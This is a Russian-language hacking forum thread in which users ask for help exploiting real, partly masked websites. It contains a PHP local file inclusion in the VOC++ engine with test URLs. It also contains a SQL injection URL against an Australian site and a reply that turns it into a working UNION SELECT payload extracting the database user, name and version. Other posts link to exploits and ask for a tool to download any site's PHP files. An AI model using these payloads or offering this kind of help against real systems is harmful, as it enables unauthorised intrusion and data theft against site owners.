Старый 22.01.2012, 20:24   #1641
mailbrush
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 4
По умолчанию

Здравствуйте. Нашёл инклуд на сайте. Уявзимая переменная подставляется в середину строки, нулл-байт экранируется (а точнее, при использовании нулл-байта скрипт ведет себя так, как будто переменной вообще нету). Остаётся только этот вариант: http://raz0r.name/articles/null-byte-alternative/. Как я только не пробовал, максимум что мне удалось добиться - вывод пустой страницы. Последняя надежда только на вас, Рдот'овцы . Вот кусок уязвимого кода этого движка:

PHP код:
if(!is_file("languages/".$lang.".php")) {
  if(
$lang == ""$lang="admin-en";
  include(
"../inc_common.php");
  if(!
is_file($file_path."admin/languages/".$lang.".php")) {
          echo 
"<font style=\"color:#666666;font-family:Verdana\"><b>No language packs detected! Please reinstall VOC++!</b></font>";
          exit;
  }
  else {
          
chdir($file_path."admin");
          include(
$file_path."admin/languages/".$lang.".php");
  }
}
else include(
$file_path."languages/".$lang.".php"); // << ИНКЛУД 
Код:
http://***.ru/admin/?lang=admin-ru&file_path=./ - OK
http://***.ru/admin/?lang=admin-ru&file_path=trololo - BAD
http://***.ru/admin/?lang=admin-ru&file_path=./trololo/../ - OK

Последний раз редактировалось Twost; 21.08.2013 в 13:55..
mailbrush вне форума   Ответить с цитированием
Старый 22.01.2012, 21:42   #1642
Beched
 
Регистрация: 06.07.2010
Сообщений: 402
Репутация: 118
По умолчанию

Цитата:
Сообщение от mailbrush Посмотреть сообщение
Здравствуйте. Нашёл инклуд на сайте. Уявзимая переменная подставляется в середину строки, нулл-байт экранируется (а точнее, при использовании нулл-байта скрипт ведет себя так, как будто переменной вообще нету). Остаётся только этот вариант: http://raz0r.name/articles/null-byte-alternative/. Как я только не пробовал, максимум что мне удалось добиться - вывод пустой страницы. Последняя надежда только на вас, Рдот'овцы . Вот кусок уязвимого кода этого движка:

PHP код:
if(!is_file("languages/".$lang.".php")) {
  if(
$lang == ""$lang="admin-en";
  include(
"../inc_common.php");
  if(!
is_file($file_path."admin/languages/".$lang.".php")) {
          echo 
"<font style=\"color:#666666;font-family:Verdana\"><b>No language packs detected! Please reinstall VOC++!</b></font>";
          exit;
  }
  else {
          
chdir($file_path."admin");
          include(
$file_path."admin/languages/".$lang.".php");
  }
}
else include(
$file_path."languages/".$lang.".php"); // << ИНКЛУД 
Код:
http://***.ru/admin/?lang=admin-ru&file_path=./ - OK
http://***.ru/admin/?lang=admin-ru&file_path=trololo - BAD
http://***.ru/admin/?lang=admin-ru&file_path=./trololo/../ - OK


Если версия php >= 5.3.4, то никак. Вернее неизвестно, как.

Последний раз редактировалось Twost; 21.08.2013 в 13:55..
Beched вне форума   Ответить с цитированием
Старый 23.01.2012, 10:57   #1643
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Или вывода нет, или я недоглядел. Прошу помощи, необходимо сделать вывод если возможно:

Код:
http://www.***.au/index.php?ap=5149376+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80--+

Последний раз редактировалось Twost; 21.08.2013 в 13:56..
Consistent вне форума   Ответить с цитированием
Старый 23.01.2012, 11:38   #1644
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Consistent Посмотреть сообщение
Или вывода нет, или я недоглядел. Прошу помощи, необходимо сделать вывод если возможно:

Код:
http://www.***.au/index.php?ap=5149376+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80--+
Код:
http://www.***.au/index.php?ap=5149376+and+1=3+union+select+1,2,3,2,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2%20--%201
__________________
|

Последний раз редактировалось Twost; 21.08.2013 в 13:56..
Boolean вне форума   Ответить с цитированием
Старый 24.01.2012, 15:53   #1645
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Есть тут хоть какой-нибудь вывод?
http://***.ru/?page_id=289/forum-16'/topic-2073

Эти не сработали:
http://sebug.net/vuldb/ssvid-8111
http://www.exploit-db.com/exploits/5127/

Последний раз редактировалось Twost; 21.08.2013 в 13:56..
dumb вне форума   Ответить с цитированием
Старый 24.01.2012, 17:18   #1646
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от dumb Посмотреть сообщение
Есть тут хоть какой-нибудь вывод?
http://***.ru/?page_id=289/forum-16'/topic-2073

Эти не сработали:
http://sebug.net/vuldb/ssvid-8111
http://www.exploit-db.com/exploits/5127/
Boolean, сорри. Ошибся постом

Вывода добиться не удасться, так как это не sql, а неправильная работа скрипта

Последний раз редактировалось Twost; 21.08.2013 в 13:56..
Flakt вне форума   Ответить с цитированием
Старый 24.01.2012, 18:43   #1647
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

когда 504 Gateway Timeout от apache, PHP выполняеться (ну допустим скрипт запустился, и потом сообщение, скрипт сделает свое дело?)?
}{оттабыч вне форума   Ответить с цитированием
Старый 24.01.2012, 19:44   #1648
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от }{оттабыч Посмотреть сообщение
когда 504 Gateway Timeout от apache, PHP выполняеться (ну допустим скрипт запустился, и потом сообщение, скрипт сделает свое дело?)?
да, скрипт выполнится
Flakt вне форума   Ответить с цитированием
Старый 24.01.2012, 20:58   #1649
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

есть ли такой tool скачать любой .php файл в сайте ?
salut вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot